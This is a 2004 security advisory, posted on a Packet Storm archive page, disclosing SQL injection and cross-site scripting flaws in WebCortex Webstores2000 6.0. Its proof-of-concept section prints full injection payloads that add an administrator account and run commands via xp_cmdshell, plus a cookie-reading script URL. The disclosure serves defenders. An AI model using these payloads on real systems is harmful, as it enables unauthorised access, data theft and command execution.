exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Adv-20040218.txt

Adv-20040218.txt
Posted Feb 18, 2004
Authored by Nick Gudov | Site s-quadra.com

S-Quadra Advisory #2004-02-18 - WebCortex Webstores2000 version 6.0 has a SQL injection vulnerability that allows a remote attacker to add an administrative account and it also has a cross site scripting flaw.

tags | exploit, remote, xss, sql injection
SHA-256 | 413be3fc56f6d324062e5d7d79c97bdd9b708064513a7e39c078ee57bbf3f793

Adv-20040218.txt

Change Mirror Download
          S-Quadra Advisory #2004-02-18

Topic: WebCortex Webstores2000 version 6.0 multiple security vulnerabilities
Severity: High
Vendor URL: http://www.webcortex.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040218.txt
Release date: 18 Feb 2004

1. DESCRIPTION

Webstores2000 is a complete solution for building shopping carts and
shopping malls
for e-commerce enabled sites. Its written on ASP, works on most Windows
platforms
and uses MS Access or MS SQL Server as a backend.
Please visit http://www.webcortex.com for information about Webstores2000.

2. DETAILS

-- Vulnerability 1: SQL Injection vulnerability

An SQL Injection vulnerability has been found in the 'browse_items.asp'
script

User supplied input is not filtered before being used in a SQL query.
Consequently,
query modification using malformed input is possible.

Successfull exploitation of this vulnerability could allow an attacker
to gain
administrative access to shopping mall and read any information from
database (i.e. customers private data). Also an attacker could execute
arbitrary
commands using xp_cmdshell function.

-- Vulnerability 2: Cross Site Scripting vulnerability in 'error.asp'

By injecting specially crafted javascript code in url and tricking a
user to visit
it a remote attacker can steal user session id and gain access to user's
personal data.

--PoC code

--Vulnerability 1:

Platform: MS SQL Server as a backend

Posting this data to browse_items.asp creates new administrative account

Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%28Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--&Search_Store.x=0&Search_Store.y=0

Posting this data to browse_items.asp executes 'dir c:' command

Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Bexec+master..xp_cmdshell+%27dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=4

-- Vulnerability 2:

http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>

3. FIX INFORMATION
S-Quadra alerted WebCortex development team to this issue on 13th
February 2004.
The following response from Shay Sabah has been received:
"OK... All of these have been fixed...
Now, I ask you to please STOP using our software and making all these
"security" emails..."

4. CREDITS

Nick Gudov <cipher@s-quadra.com> is responsible for discovering this issue.

5. ABOUT

S-Quadra offers services in computer security, penetration testing and
network assesment,
web application security, source code review and third party product
vulnerability assesment,
forensic support and reverse engineering.

S-Quadra Advisory #2004-02-18
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close